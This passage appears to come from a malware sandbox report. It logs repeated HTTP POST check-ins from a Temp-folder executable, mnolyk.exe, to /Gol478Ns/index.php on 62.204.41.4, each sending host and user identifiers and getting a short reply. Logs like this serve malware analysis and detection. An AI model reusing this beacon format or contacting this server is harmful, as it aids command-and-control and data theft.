                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:10.078298092 CET589INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      475192.168.2.75017062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:10.682104111 CET590OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:10.745945930 CET590INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      476192.168.2.75017162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:10.958889961 CET591OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:11.023277998 CET591INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      477192.168.2.75017262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:11.243218899 CET592OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:11.306339979 CET592INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      478192.168.2.75017362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:11.479350090 CET593OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:11.544918060 CET593INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      479192.168.2.75017462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:11.713079929 CET594OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:11.777556896 CET594INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      48192.168.2.74974262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:13.217593908 CET152OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:13.279896975 CET152INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      480192.168.2.75017562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:11.950103045 CET595OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:12.012918949 CET595INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      481192.168.2.75017662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:12.185199976 CET596OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:12.250057936 CET596INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      482192.168.2.75017762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:12.432080030 CET597OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:12.495201111 CET597INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      483192.168.2.75017862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:12.666182041 CET598OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:12.730153084 CET598INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      484192.168.2.75017962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:12.913891077 CET599OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:12.977729082 CET599INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      485192.168.2.75018062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:13.154966116 CET600OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:13.220128059 CET600INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      486192.168.2.75018162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:13.403024912 CET601OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:13.468801975 CET601INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      487192.168.2.75018262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:13.649408102 CET602OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:13.712430954 CET602INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      488192.168.2.75018362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:13.886210918 CET603OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:13.950521946 CET603INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      489192.168.2.75018462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:14.118143082 CET604OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:14.182687998 CET604INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      49192.168.2.74974362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:13.457751036 CET153OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:13.521526098 CET155INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      490192.168.2.75018562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:14.360321999 CET605OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:14.423168898 CET605INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      491192.168.2.75018662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:14.607278109 CET606OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:14.671169043 CET606INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
